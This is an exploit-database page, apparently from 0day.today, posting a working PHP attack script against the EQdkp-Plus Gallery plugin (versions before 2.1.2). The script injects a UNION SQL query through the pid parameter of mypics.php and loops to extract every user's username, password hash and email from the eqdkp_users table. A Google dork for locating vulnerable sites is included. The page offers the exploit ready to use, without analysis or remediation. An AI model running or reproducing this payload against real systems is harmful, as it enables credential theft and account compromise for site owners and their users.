[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

EQdkp-Plus Gallery < v2.1.2 Blind SQL Injection Vulnerabilty

Author
jiuX
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13273
Category
web applications
Date add
10-07-2010
Platform
php
============================================================
EQdkp-Plus Gallery < v2.1.2 Blind SQL Injection Vulnerabilty
============================================================


#!/bin/php
<?php
/*
######################################################################
#        _           _       _                 _                     #
#       | |         | |     | |               | |                    #
#       | |__  _   _| |_ ___| |__  _   _ _ __ | | _____ _ __         #
#       | '_ \| | | | __/ _ \ '_ \| | | | '_ \| |/ / _ \ '__|        #
#       | |_) | |_| | ||  __/ |_) | |_| | | | |   <  __/ |           #
#       |_.__/ \__, |\__\___|_.__/ \__,_|_| |_|_|\_\___|_|           #
#               __/ |                      by jiuX                   #
#              |___/                                                 #
######################################################################
# Name : EQdkp-Plus Gallery < v2.1.2 
# Date : 10.07.2010
# Platform: Linux/Windows
# Vendor : Badtwin & Lunary
# Google Dork: > "EQDKP Plus" inurl:mypics.php <
# greetz to : x2k, medison, x33, bl4ckn3ss, Luk ...
######################################################################
*/
$x = $argv[1]."/portal/plugins/gallery/mypics.php?pid=-1337+and+1=0+union+select+1,2,concat%280x62797465,username,0x3A,user_password,0x3A,user_email,0x62756e6b6572%29,4,5,6,7,8+from+eqdkp_users";
function b($b,$c) {
$b = file_get_contents($b."+limit+".$c.",1--%20-");
preg_match_all("/byte(.*)bunker/",$b,$w, PREG_PATTERN_ORDER);
$w = explode(":",$w[1][0]);
if (!$w[0]=="") {
echo "ID: ".$c."\nUsername: ".$w[0]."\n";echo "Password: ".$w[1]."\n";echo "E-Mail: ".$w[2]."\n-----------------------\n";return true;
}else{return false;}}
echo "-----------------------\nChecking: ".$argv[1]."\n-----------------------\n";
$i=0;$bb=true;while($bb == true){ $bb = b($x,$i);	$i++;  }



#  0day.today [2024-12-26]  #